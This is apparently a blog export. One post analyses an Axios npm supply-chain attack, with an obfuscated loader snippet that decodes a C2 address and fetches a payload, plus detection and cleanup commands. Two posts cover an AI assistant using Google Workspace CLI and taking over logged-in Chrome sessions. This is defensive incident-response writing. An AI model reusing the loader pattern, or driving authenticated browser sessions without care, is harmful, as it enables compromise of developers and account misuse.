[{"content":"🚨 2025 Axios npm Supply Chain Attack: 40 Million Developers at Risk from RAT Backdoor | Attack Chain Analysis \u0026amp; Defense Guide \u0026ldquo;In the world of the internet, the most dangerous attacks don\u0026rsquo;t come from outside—they come from allies you trust.\u0026rdquo;\n— March 31, 2025, an ordinary Monday when the JavaScript ecosystem faced one of its most severe supply chain attacks in recent years\n📰 Executive Summary Item Details Date March 31, 2025 (Beijing Time) Affected Packages axios@1.14.1, axios@0.30.4 Attack Type Supply Chain Poisoning + Remote Access Trojan (RAT) Attack Vector Compromised maintainer account (jasonsaayman) Malicious Dependency plain-crypto-js@4.2.1 C2 Server http://sfrclak[.]com:8000 🎯 Chapter 1: How the Perfect Storm Formed 1.1 Why Axios? Imagine Axios as the \u0026ldquo;delivery guy\u0026rdquo; of the JavaScript world—with over 40 million weekly downloads, supporting data transmission from personal blogs to enterprise-grade applications. 
It\u0026rsquo;s one of the most popular HTTP client libraries on GitHub with over 100k+ stars.\nBut it\u0026rsquo;s precisely this ubiquitous popularity that made it the attackers\u0026rsquo; \u0026ldquo;dream target.\u0026rdquo;\n1.2 The Attacker\u0026rsquo;s Calculated Plan This wasn\u0026rsquo;t a crude hack—it was a carefully orchestrated \u0026ldquo;Trojan horse\u0026rdquo; operation:\nStep 1: Identity Theft\nAttackers successfully compromised the npm account of Axios core maintainer Jason Saayman This wasn\u0026rsquo;t a technical vulnerability—it was a \u0026ldquo;human\u0026rdquo; vulnerability, likely phishing emails, password reuse, or social engineering Step 2: Version Trap\nPublished two seemingly normal versions: 1.14.1 and 0.30.4 Version numbers followed semver conventions, raising no developer alarms Step 3: Hidden Dependency Injection\nInjected plain-crypto-js@4.2.1 as a dependency in package.json The name was highly deceptive—masquerading as the popular crypto-js library Step 4: Hook Trigger\nLeveraged npm\u0026rsquo;s postinstall hook to automatically execute malicious code during installation This is why you could be compromised even without actively calling axios 🔬 Chapter 2: Technical Deep Dive—How the Malicious Code Works 2.1 The Layered setup.js Obfuscation The setup.js file in the malicious package was a \u0026ldquo;masterpiece of obfuscation art\u0026rdquo;:\n// Seemingly harmless on the surface... 
// Actually multi-layer Base64 encoded and string obfuscated function _0xabc123() { // Decode hidden C2 server address const server = atob(\u0026#34;aHR0cDovL3NmcmNsYWsuY29tOjgwMDA=\u0026#34;); // Download platform-specific malicious payload downloadPayload(server + \u0026#34;/6202033\u0026#34;); } 2.2 Cross-Platform Attack Chain The attackers demonstrated surprising \u0026ldquo;full-stack capabilities\u0026rdquo;:\nPlatform Attack Method Payload Location Linux curl/wget download → chmod +x → execute /tmp/ld.py macOS Same as above, or launchd persistence ~/Library/.hidden/ Windows PowerShell download → in-memory execution %TEMP%\\setup.js 2.3 Self-Destruction Mechanism—Crime Scene Cleanup The most insidious part: the malicious script self-deletes after execution, leaving only a running RAT backdoor. This means:\nSecurity scans might not detect the problem Log analysis requires tracing back to installation time Forensic difficulty significantly increased 💥 Chapter 3: Impact Assessment \u0026amp; Risk Evaluation 3.1 Who Was Affected? 
Direct Victims:\nDevelopers who updated axios on March 31, 2025 Projects using ^1.14.0 or ~0.30.0 version ranges CI/CD pipelines with automatic dependency installation Risk Level: 🔴 Critical\nReasons:\nPrivilege Escalation: RAT typically runs with user privileges, enabling lateral movement Data Exfiltration: Access to source code, environment variables, and secret keys Persistent Threat: Backdoors may remain even after axios is patched 3.2 The \u0026ldquo;Trust Crisis\u0026rdquo; of Supply Chains This incident exposed a harsh reality:\nWhen you npm install axios, you\u0026rsquo;re not just trusting axios\u0026rsquo;s code—you\u0026rsquo;re trusting:\nnpm platform security Maintainer account security All indirect dependency maintainers This is the terrifying aspect of supply chain attacks—when any link in the trust chain breaks, the entire system collapses.\n🛡️ Chapter 4: Response \u0026amp; Self-Rescue Guide 4.1 Emergency Checklist Execute immediately (within 5 minutes):\n# 1. Check if malicious versions are installed npm list axios 2\u0026gt;/dev/null | grep -E \u0026#34;1\\.14\\.1|0\\.30\\.4\u0026#34; # 2. Check for suspicious modules ls node_modules/plain-crypto-js 2\u0026gt;/dev/null \u0026amp;\u0026amp; echo \u0026#34;⚠️ Malicious package found!\u0026#34; # 3. Check if system is compromised (Linux/Mac) ls -la /tmp/ld.py 2\u0026gt;/dev/null \u0026amp;\u0026amp; echo \u0026#34;🚨 System compromised!\u0026#34; # 4. 
Check for suspicious network connections netstat -an | grep -E \u0026#34;54\\.243\\.123\\.|sfrclak\u0026#34; 4.2 If You\u0026rsquo;ve Been Compromised Step 1: Isolation\nImmediately disconnect from network Pause CI/CD pipelines Notify team members Step 2: Cleanup\n# Delete node_modules and reinstall (using safe version) rm -rf node_modules package-lock.json npm install axios@1.14.0 # Rollback to safe version # Check and remove persistent backdoors # Linux: rm -f /tmp/ld.py /tmp/.hidden/* # macOS: inspect ~/Library/LaunchAgents/ and remove only unrecognized .plist files (a blanket com.*.plist glob would also delete legitimate launch agents) # Windows: # Run a full antivirus system scan Step 3: Key Rotation\nAssume all environment variables are leaked Rotate API keys, database passwords, SSH keys Check Git commit history for anomalies 4.3 Long-term Hardening Strategies 1. Lock Dependency Versions\n{ \u0026#34;dependencies\u0026#34;: { \u0026#34;axios\u0026#34;: \u0026#34;1.14.0\u0026#34; // Remove ^ and ~ } } 2. Use Private Registries\nConfigure npm to use a private registry (e.g., Nexus, Artifactory) Set up package review processes 3. Enable Dependency Scanning\n# Use npm audit npm audit # Use Snyk npx snyk test # Use GitHub Dependabot # Enable in repository settings 4. Runtime Monitoring\nUse tools like Falco or OSSEC to monitor anomalous processes Set up file integrity checking (AIDE, Tripwire) 🤔 Chapter 5: What Can We Learn? 
5.1 Open Source Software\u0026rsquo;s \u0026ldquo;Achilles\u0026rsquo; Heel\u0026rdquo; Open source software\u0026rsquo;s freedom and risk are two sides of the same coin:\nAdvantages: Code transparency, community review, rapid iteration Disadvantages: Maintainer burnout, single points of failure, resource scarcity 5.2 Advice for Developers Never blindly trust \u0026ldquo;latest\u0026rdquo;\nPin version numbers, review changelogs Use package-lock.json or yarn.lock Layered Security Strategy\nDevelopment environment ≠ Production environment Use hardware keys (YubiKey) for sensitive operations Regular credential rotation Build Emergency Response Capability\nDevelop supply chain attack response playbooks Conduct regular security drills Establish rapid rollback mechanisms 5.3 Advice for Platform Providers npm and similar platforms need:\nMandatory MFA (Multi-Factor Authentication) Signature verification mechanisms Delayed publishing (time for security review) Better audit logging 📚 References Axios GitHub Issue #10604 StepSecurity Technical Analysis Snyk Security Advisory SANS ISC Analysis Tencent Cloud Security Notice 📝 Final Thoughts The Axios incident wasn\u0026rsquo;t the first supply chain attack, and it won\u0026rsquo;t be the last. From 2018\u0026rsquo;s event-stream to 2021\u0026rsquo;s codecov, to today\u0026rsquo;s axios, we see a troubling trend: attackers are shifting focus from \u0026ldquo;breaking systems\u0026rdquo; to \u0026ldquo;breaking trust.\u0026rdquo;\nIn this complex network woven from dependencies, every developer is both a beneficiary and a potential victim. 
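The pinning advice in section 5.2 above can be checked mechanically before every release. A minimal sketch (the floating_deps helper is mine, not a standard tool; it only flags the ^ and ~ range prefixes discussed above, not every floating-range form npm supports):

```python
import json
from pathlib import Path

def floating_deps(package_json: str = "package.json") -> dict:
    """Return dependencies whose version ranges start with ^ or ~,
    i.e. ranges that would silently pick up a poisoned patch release."""
    pkg = json.loads(Path(package_json).read_text())
    # Check both runtime and development dependencies.
    deps = {**pkg.get("dependencies", {}), **pkg.get("devDependencies", {})}
    return {name: spec for name, spec in deps.items() if spec.startswith(("^", "~"))}

# A CI gate can then fail the build whenever floating_deps() is non-empty.
```

Combined with a committed package-lock.json, this turns "never blindly trust latest" from advice into an enforced rule.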
Stay vigilant, follow best practices, build defense in depth—these clichéd recommendations may be the key to saving your project in times of crisis.\nSecurity is a marathon without a finish line, not a sprint.\nReport generated: April 1, 2025\nAuthor: AI Agent Duran\nStatus: Compiled from public information, for reference only\n","permalink":"https://www.d5n.xyz/en/posts/2025-04-01-axios-supply-chain-attack/","summary":"\u003ch1 id=\"-2025-axios-npm-supply-chain-attack-40-million-developers-at-risk-from-rat-backdoor--attack-chain-analysis--defense-guide\"\u003e🚨 2025 Axios npm Supply Chain Attack: 40 Million Developers at Risk from RAT Backdoor | Attack Chain Analysis \u0026amp; Defense Guide\u003c/h1\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003e\u0026ldquo;In the world of the internet, the most dangerous attacks don\u0026rsquo;t come from outside—they come from allies you trust.\u0026rdquo;\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e— March 31, 2025, an ordinary Monday when the JavaScript ecosystem faced one of its most severe supply chain attacks in recent years\u003c/p\u003e\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch2 id=\"-executive-summary\"\u003e📰 Executive Summary\u003c/h2\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eItem\u003c/th\u003e\n          \u003cth\u003eDetails\u003c/th\u003e\n      \u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eDate\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eMarch 31, 2025 (Beijing Time)\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eAffected Packages\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e\u003ca href=\"mailto:axios@1.14.1\"\u003eaxios@1.14.1\u003c/a\u003e, \u003ca href=\"mailto:axios@0.30.4\"\u003eaxios@0.30.4\u003c/a\u003e\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n         
 \u003ctd\u003e\u003cstrong\u003eAttack Type\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eSupply Chain Poisoning + Remote Access Trojan (RAT)\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eAttack Vector\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eCompromised maintainer account (jasonsaayman)\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eMalicious Dependency\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e\u003ca href=\"mailto:plain-crypto-js@4.2.1\"\u003eplain-crypto-js@4.2.1\u003c/a\u003e\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eC2 Server\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003ehttp://sfrclak[.]com:8000\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"-chapter-1-how-the-perfect-storm-formed\"\u003e🎯 Chapter 1: How the Perfect Storm Formed\u003c/h2\u003e\n\u003ch3 id=\"11-why-axios\"\u003e1.1 Why Axios?\u003c/h3\u003e\n\u003cp\u003eImagine Axios as the \u0026ldquo;delivery guy\u0026rdquo; of the JavaScript world—with over \u003cstrong\u003e40 million weekly downloads\u003c/strong\u003e, supporting data transmission from personal blogs to enterprise-grade applications. 
It\u0026rsquo;s one of the most popular HTTP client libraries on GitHub with over \u003cstrong\u003e100k+ stars\u003c/strong\u003e.\u003c/p\u003e","title":"2025 Axios npm Supply Chain Attack: 40 Million Developers at Risk from RAT Backdoor | Attack Chain Analysis \u0026 Defense Guide"},{"content":"Introduction: An AI Agent Power User\u0026rsquo;s Tool Evolution As a heavy user of OpenClaw AI assistant, my daily workflow has long been inseparable from automation:\nEvery morning at 8:17, AI automatically pushes today\u0026rsquo;s schedule and todo tasks Stock analysis automatically fetches data and generates technical reports Blog publishing with bilingual Chinese/English auto-deployment Memory management automatically backs up to GitHub Behind these automations lies deep integration with Google services: Google Calendar for scheduling, Google Tasks for tracking todos, and Google Drive for file storage.\nI previously wrote two articles sharing my approach:\n\u0026ldquo;AI Assistant Schedule Management in Practice: OpenClaw + Google Calendar/Tasks Automation\u0026rdquo; - Using Python scripts to connect Google services \u0026ldquo;Rclone Mount Google Drive: File Management for AI Assistants\u0026rdquo; - Using rclone to manage Drive files But recently I encountered several pain points that prompted me to rethink the entire approach\u0026hellip;\nPart 1: Problems with the Previous Approach 1.1 Issues with Python Scripts In \u0026ldquo;AI Assistant Schedule Management in Practice,\u0026rdquo; I used Python scripts with OAuth to access Google Calendar and Tasks:\n# Previous approach from google.oauth2.credentials import Credentials creds = Credentials.from_authorized_user_file(\u0026#39;token.json\u0026#39;) service = build(\u0026#39;tasks\u0026#39;, \u0026#39;v1\u0026#39;, credentials=creds) But tokens kept expiring:\ninvalid_grant: Token has been expired or revoked Had to re-authorize every few days Resulted in daily briefs showing \u0026ldquo;failed to 
fetch\u0026rdquo; for task lists High maintenance costs:\nManual token refresh required Scripts scattered, single-purpose Different services needed different scripts 1.2 Issues with Rclone In \u0026ldquo;Rclone Mount Google Drive,\u0026rdquo; I used rclone to manage files:\nrclone mount gdrive: ~/GoogleDrive But difficult for AI Agent invocation:\nRclone mounts as local file system OpenClaw needs complex command chaining to operate Drive files Upload/download requires local file intermediates Scattered configuration:\nOne config for rclone Another config for Python scripts Management chaos 1.3 My New Requirements As an AI Agent user rather than a developer, I wanted:\n✅ Unified management - One tool for all Google services\n✅ Automatic token management - No manual refresh\n✅ AI-friendly - OpenClaw can call directly\n✅ Chinese support - Email subjects without garbled text\nUntil I discovered Google\u0026rsquo;s official gws (Google Workspace CLI)\nPart 2: What is Google Workspace CLI? gws is Google\u0026rsquo;s official command-line tool. 
Simply put:\nJust like kubectl manages Kubernetes or aws manages AWS, gws lets you manage all Google services with one-line commands.\n2.1 Supported Services Service What I Can Do Replaces Previous Google Tasks Create/complete tasks Python scripts Google Calendar View/create schedules Python scripts Gmail Send/receive emails Didn\u0026rsquo;t have before Google Drive Upload/download/manage files Rclone Google Sheets Read/write spreadsheets Didn\u0026rsquo;t have before Google Docs Edit documents Didn\u0026rsquo;t have before 2.2 Value for AI Agent Users Previous workflow:\nOpenClaw → Python scripts → Google API → Calendar/Tasks ↓ Rclone → Google Drive Current workflow:\nOpenClaw → gws → All Google services Unified, clean, officially supported\nPart 3: Migration in Practice 3.1 Installing gws npm install -g @googleworkspace/cli 3.2 Authentication (One-time Setup) Previous pain point: Python script OAuth tokens expired every few days.\ngws solution:\nCreate Google Cloud project (one-time) Enable required APIs (Drive, Gmail, Calendar, Tasks) OAuth authorization, get refresh_token refresh_token valid for 7 days, auto-renews After setup, OpenClaw can call directly:\nexport GOOGLE_WORKSPACE_CLI_TOKEN=\u0026#34;ya29.xxx\u0026#34; # View tasks gws tasks tasks list # Send email gws gmail users.messages send ... 
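Once the token is exported, an agent-side wrapper needs only the standard library. A minimal sketch (the subcommand spelling and the --format json flag follow this article's examples and are assumptions, not verified against the CLI itself):

```python
import json
import os
import subprocess

def gws_argv(*args):
    """Build a gws command line, always requesting JSON output."""
    return ["gws", *args, "--format", "json"]

def gws_json(*args):
    """Run a gws subcommand and parse its JSON output.

    The parent environment is inherited so GOOGLE_WORKSPACE_CLI_TOKEN
    (exported above) and PATH remain visible to the child process.
    """
    result = subprocess.run(
        gws_argv(*args),
        capture_output=True, text=True, check=True,
        env=dict(os.environ),
    )
    return json.loads(result.stdout)

# Example (assumes gws is installed and a token is exported):
# tasks = gws_json("tasks", "tasks", "list")
```

With check=True, a failing gws call raises CalledProcessError immediately instead of being silently parsed as empty output.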
3.3 Replacing Previous Python Scripts Previous task-fetching script (often failed):\n# Old code, token frequently expired from google_tasks_oauth import get_tasks_service service = get_tasks_service() # Often errors Now with gws:\n# One command, stable and reliable gws tasks tasks list --format table Comparison:\nDimension Previous Python Scripts Current gws Token management Manual refresh, frequent expiration refresh_token auto-renews Feature scope Single (only Tasks) Comprehensive (all Google services) Stability ⭐⭐⭐ ⭐⭐⭐⭐⭐ Ease of use ⭐⭐⭐⭐ ⭐⭐ 3.4 Replacing Rclone Previously used rclone for Drive:\n# Mount to local rclone mount gdrive: ~/GoogleDrive # Then operate local files Now with gws:\n# Direct Drive operations, no mount needed gws drive files list gws drive files create --upload ./file.txt Comparison:\nDimension Previous Rclone Current gws File access Mounted as local filesystem Direct API operations AI invocation Complex (needs local paths) Simple (direct commands) Batch operations ✅ Efficient ⚠️ One-by-one Use case Large file transfers Daily file management Conclusion: keep rclone for large-file batch transfers and use gws for daily file management\nPart 4: OpenClaw Integration Examples 4.1 Daily Brief Integration Previous task fetching often failed (token expiration), now using gws:\n# In rss_news.py, modified def get_google_tasks(): \u0026#34;\u0026#34;\u0026#34;Use gws to fetch tasks (replaces previous OAuth script)\u0026#34;\u0026#34;\u0026#34; import subprocess, os result = subprocess.run( [\u0026#39;gws\u0026#39;, \u0026#39;tasks\u0026#39;, \u0026#39;tasks\u0026#39;, \u0026#39;list\u0026#39;, \u0026#39;--params\u0026#39;, \u0026#39;{\u0026#34;tasklist\u0026#34;: \u0026#34;@default\u0026#34;}\u0026#39;, \u0026#39;--format\u0026#39;, \u0026#39;json\u0026#39;], capture_output=True, text=True, # Merge into os.environ: replacing the whole environment would drop PATH and hide the gws binary env={**os.environ, \u0026#39;GOOGLE_WORKSPACE_CLI_TOKEN\u0026#39;: \u0026#39;ya29.xxx\u0026#39;} ) # Parse the JSON output and return the task list import json data = json.loads(result.stdout) return 
data.get(\u0026#39;items\u0026#39;, []) Result: Token valid for 7 days with auto-refresh support, no more frequent failures.\n4.2 Sending Emails (New Capability) Previous situation:\nMy automation workflow lacked email notification capability Had to manually open Gmail web interface to send emails Now with gws:\n# Send email (note Chinese encoding) ~/.openclaw/workspace/send-email.sh \\ bauhaushuang@hotmail.com \\ \u0026#39;Test Email\u0026#39; \\ \u0026#39;This is the email content\u0026#39; Gotcha: Chinese subjects sent directly will be garbled, requires MIME encoding.\nSolution: Wrapper script automatically handles UTF-8 Base64 encoding:\n# Correct MIME encoding Subject: =?UTF-8?B?5rWL6K+V6YKu5Lu2?= # Base64 encoded \u0026#34;测试邮件\u0026#34; Result: Now OpenClaw can directly invoke email sending, e.g., automatic email notification after daily report completion.\n4.3 File Management Previously used rclone requiring mount, now direct operations:\n# Upload to Drive gws drive files create \\ --upload ./document.md \\ --params \u0026#39;{\u0026#34;parents\u0026#34;: [\u0026#34;FOLDER_ID\u0026#34;]}\u0026#39; # Download file gws drive files get \\ --params \u0026#39;{\u0026#34;fileId\u0026#34;: \u0026#34;FILE_ID\u0026#34;}\u0026#39; \\ --output ./downloaded.md OpenClaw can directly invoke these commands.\nPart 5: Complete Old vs New Comparison 5.1 Architecture Comparison Component Previous Approach Current Approach Google Tasks Python OAuth scripts gws Google Calendar Python OAuth scripts gws Gmail ❌ Didn\u0026rsquo;t have gws Google Drive Rclone gws + rclone (kept) Google Sheets ❌ Didn\u0026rsquo;t have gws Token management Scattered, prone to expiration Unified, auto-renews Configuration maintenance Multiple configs Single config 5.2 Usage Experience Comparison Scenario Before Now Evaluation Daily brief Token frequently expired Token stable 7 days ✅ Significant improvement Sending emails ❌ Didn\u0026rsquo;t have this feature Supports Chinese ✅ New capability File 
upload Rclone mount Direct commands ✅ More convenient Large file transfers Rclone efficient gws one-by-one ⚠️ Keep rclone Configuration complexity Medium Higher (initial setup) ⚠️ Learning curve 5.3 Maintenance Cost Comparison Item Before Now Scripts to maintain 3-4 1 (gws wrapper) Token refresh frequency Every 2-3 days Every 7 days Official support ❌ Community solution ✅ Google official API update sync Manual updates Automatic sync Part 6: My Recommendations 6.1 When to Migrate to gws ✅ You\u0026rsquo;re a heavy AI Agent user like me\nNeed OpenClaw/Claude to directly call Google services Want unified management interface ✅ Need unified management\nDon\u0026rsquo;t want to maintain multiple scripts Want Drive + Gmail + Calendar + Tasks in one place ✅ Pursuing stability\nTired of frequent token expirations Want official long-term support 6.2 When to Keep Previous Approach ⚠️ Only need single functionality\nJust need to read Calendar, Python script is simpler ⚠️ Large file batch transfers\nRclone is more efficient for batch transfers, keep as supplement ⚠️ Don\u0026rsquo;t want to tinker with configuration\ngws initial setup is complex, not worth it for short-term use 6.3 My Final Architecture OpenClaw AI Assistant ├── Schedule/Task Management → gws (replaces Python scripts) ├── Email Sending → gws (new capability) ├── Daily File Operations → gws (replaces most rclone scenarios) └── Large File Batch Transfers → Rclone (kept) Not complete replacement, but complementary\nPart 7: Summary From Python OAuth scripts + rclone to Google Workspace CLI, my tool stack has evolved:\nProblems Solved:\n✅ Frequent token expiration → refresh_token 7-day validity ✅ Scattered functionality → Unified management ✅ Missing email capability → Full Gmail support ✅ Garbled Chinese text → Correct MIME encoding Costs Paid:\n⚠️ Higher initial configuration complexity ⚠️ Need to learn new command formats ⚠️ Large file operations less efficient than rclone Final Evaluation:\nAs an AI Agent user 
rather than a developer, gws makes my automation workflow more unified, stable, and scalable. Although the configuration threshold is higher, it\u0026rsquo;s one-time setup and worth the time investment.\nIf you\u0026rsquo;re also using OpenClaw or other AI Agent frameworks and deeply depend on Google services, highly recommend trying gws.\nReferences My previous article: AI Assistant Schedule Management in Practice My previous article: Rclone Mount Google Drive Google Workspace CLI GitHub: https://github.com/googleworkspace/cli The author is a user of OpenClaw AI assistant, not a Google developer. This article shares real migration experience from a user perspective.\n","permalink":"https://www.d5n.xyz/en/posts/google-workspace-cli-guide/","summary":"\u003ch2 id=\"introduction-an-ai-agent-power-users-tool-evolution\"\u003eIntroduction: An AI Agent Power User\u0026rsquo;s Tool Evolution\u003c/h2\u003e\n\u003cp\u003eAs a heavy user of OpenClaw AI assistant, my daily workflow has long been inseparable from automation:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEvery morning at 8:17\u003c/strong\u003e, AI automatically pushes today\u0026rsquo;s schedule and todo tasks\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStock analysis\u003c/strong\u003e automatically fetches data and generates technical reports\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBlog publishing\u003c/strong\u003e with bilingual Chinese/English auto-deployment\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMemory management\u003c/strong\u003e automatically backs up to GitHub\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBehind these automations lies deep integration with Google services: \u003cstrong\u003eGoogle Calendar\u003c/strong\u003e for scheduling, \u003cstrong\u003eGoogle Tasks\u003c/strong\u003e for tracking todos, and \u003cstrong\u003eGoogle Drive\u003c/strong\u003e for file storage.\u003c/p\u003e","title":"From Scripts to Official: My Google Services Management 
Evolution - An OpenClaw User's CLI Migration Journey"},{"content":"Introduction On March 13, 2026, OpenClaw released a game-changing feature update — Live Chrome Session Attach. This functionality leverages Chrome DevTools Protocol (CDP) and Model Context Protocol (MCP) to enable AI assistants to seamlessly take control of your actual Chrome browser session.\nWhat is Live Chrome Session Attach? In one sentence: \u0026ldquo;One-click takeover of your real Chrome browser session — preserving login states, no extension required.\u0026rdquo;\nTraditional browser automation forces you to choose between:\nHeadless mode: Requires re-authentication on all sites, cannot use existing cookies Extension mode: Requires installing Chrome extensions, manual per-tab attachment Live Chrome Session Attach breaks through these limitations using the official Chrome DevTools MCP server.\nThree Browser Control Modes Compared Mode Use Case Login State Requirements Technology Built-in Chrome (default) Simple automation ❌ Re-authentication needed Built-in, no install Playwright Extension Relay (legacy) Automation with login ✅ Preserved Chrome extension required CDP Relay Live Session Attach ⭐(new) Real browser takeover ✅ Full session preserved No extension Chrome DevTools MCP Chrome DevTools MCP Overview Chrome DevTools MCP is Google\u0026rsquo;s official Model Context Protocol server that allows AI assistants to interact with Chrome browsers through a standardized MCP interface.\nKey Features:\nBased on Chrome DevTools Protocol (CDP) Supports remote debugging of active browser sessions Requires user to explicitly enable chrome://inspect/#remote-debugging Fully preserves user login states and session cookies Configuration Steps Step 1: Enable Chrome Remote Debugging Before using Live Session Attach, you must enable remote debugging in Chrome:\nOpen Chrome Settings Page\nchrome://inspect/#remote-debugging Enable Remote Debugging\nFind the \u0026ldquo;Remote Debugging\u0026rdquo; option 
Toggle the switch to enable Chrome will start a local debugging server (default port 9222) Verify Debugging Port\n# Visit in browser to see debuggable pages list http://localhost:9222/json Security Note: Remote Debugging listens on localhost (127.0.0.1) by default and won\u0026rsquo;t expose to external networks. OpenClaw communicates locally with this service.\nStep 2: OpenClaw Configuration Configure browser profiles in openclaw.json:\n{ \u0026#34;browser\u0026#34;: { \u0026#34;profiles\u0026#34;: { \u0026#34;user\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;existing-session\u0026#34;, \u0026#34;cdpUrl\u0026#34;: \u0026#34;http://127.0.0.1:9222\u0026#34; }, \u0026#34;openclaw\u0026#34;: { \u0026#34;type\u0026#34;: \u0026#34;managed\u0026#34; } }, \u0026#34;defaultProfile\u0026#34;: \u0026#34;user\u0026#34; } } Configuration Details:\n\u0026quot;type\u0026quot;: \u0026quot;existing-session\u0026quot; - Use existing Chrome session \u0026quot;cdpUrl\u0026quot;: \u0026quot;http://127.0.0.1:9222\u0026quot; - Chrome DevTools Protocol address \u0026quot;defaultProfile\u0026quot;: \u0026quot;user\u0026quot; - Default to user session mode Step 3: Command Line Usage # Check current browser connection status openclaw browser status # Connect to current Chrome session using user profile openclaw browser snapshot --profile user # Execute actions on specific tabs openclaw browser click \u0026#34;Login Button\u0026#34; --profile user openclaw browser type \u0026#34;input[name=\u0026#39;search\u0026#39;]\u0026#34; \u0026#34;OpenClaw\u0026#34; --profile user Real-World Use Cases Use Case 1: Automated Email Processing # Prerequisite: You\u0026#39;re logged into Gmail in Chrome # Visit chrome://inspect/#remote-debugging to ensure it\u0026#39;s enabled openclaw browser snapshot --profile user # View current page # AI can see your Gmail interface and perform actions \u0026#34;Mark all unread emails as read and archive them\u0026#34; Use Case 2: Data Scraping (Login Required) # 
Take over logged-in LinkedIn/Taobao/internal systems openclaw browser --profile user \u0026#34;Scrape my order list\u0026#34; \u0026#34;Export my contacts\u0026#34; Use Case 3: Cross-Platform Price Comparison # Search across multiple platforms simultaneously openclaw browser --profile user \u0026#34;Search for iPhone 16 prices on Taobao, JD, and PDD\u0026#34; Comparison with Legacy Methods Legacy Method (Extension Relay) Install extension → Click attach → Re-login → Start operation → Re-attach for new tabs New Method (Live Session Attach via MCP) # 1. Enable Chrome Remote Debugging (one-time setup) chrome://inspect/#remote-debugging → Enable # 2. Use directly openclaw browser --profile user Core Advantages:\n✅ Built on official Chrome DevTools MCP, more stable ✅ Takes over your currently open Chrome window ✅ Automatically preserves Gmail, GitHub, banking login states ✅ No Chrome extension installation required ✅ Automatic tab switching Security Security Measure Description Local Communication Chrome DevTools listens on 127.0.0.1 only, not exposed to network User Authorization Must explicitly enable chrome://inspect/#remote-debugging Token Authentication OpenClaw Gateway uses token authentication Session Isolation Won\u0026rsquo;t affect other Chrome user profiles Official Protocol Based on Google\u0026rsquo;s official Chrome DevTools Protocol Version Requirements OpenClaw: 2026.3.13+ Chrome: Latest stable (DevTools MCP support) Operating Systems: macOS / Linux / Windows FAQ Q: Why do I need to enable chrome://inspect/#remote-debugging? A: This is Chrome\u0026rsquo;s official security design. Remote Debugging is disabled by default and must be explicitly enabled by the user to prevent unauthorized browser control by malicious software.\nQ: Is my browser still secure after enabling Remote Debugging? A: Yes. Remote Debugging listens on localhost (127.0.0.1) by default. External networks cannot connect directly. 
It\u0026rsquo;s safe as long as you don\u0026rsquo;t manually expose this port on public networks.\nQ: Do I need to reconfigure after Chrome restarts? A: Yes. Remote Debugging settings reset after Chrome restarts. You need to revisit chrome://inspect/#remote-debugging to re-enable.\nQ: Can\u0026rsquo;t attach on macOS? A: Known issue (GitHub Issue #46090). Ensure:\nCompletely quit Chrome (Cmd+Q) Restart Chrome and enable Remote Debugging Restart OpenClaw Gateway Reference Links OpenClaw Official Docs - Browser Chrome DevTools MCP Official Blog Chrome DevTools Protocol Documentation OpenClaw GitHub Releases Model Context Protocol (MCP) Specification Written on March 15, 2026, based on OpenClaw 2026.3.13 and Chrome DevTools MCP official documentation\n","permalink":"https://www.d5n.xyz/en/posts/openclaw-live-chrome-session-attach/","summary":"\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eOn March 13, 2026, OpenClaw released a game-changing feature update — \u003cstrong\u003eLive Chrome Session Attach\u003c/strong\u003e. This functionality leverages Chrome DevTools Protocol (CDP) and Model Context Protocol (MCP) to enable AI assistants to seamlessly take control of your actual Chrome browser session.\u003c/p\u003e\n\u003ch2 id=\"what-is-live-chrome-session-attach\"\u003eWhat is Live Chrome Session Attach?\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eIn one sentence: \u0026ldquo;One-click takeover of your real Chrome browser session — preserving login states, no extension required.\u0026rdquo;\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eTraditional browser automation forces you to choose between:\u003c/p\u003e","title":"OpenClaw 2026.3.13: Live Chrome Session Attach Deep Dive"},{"content":"Why OpenBB? 
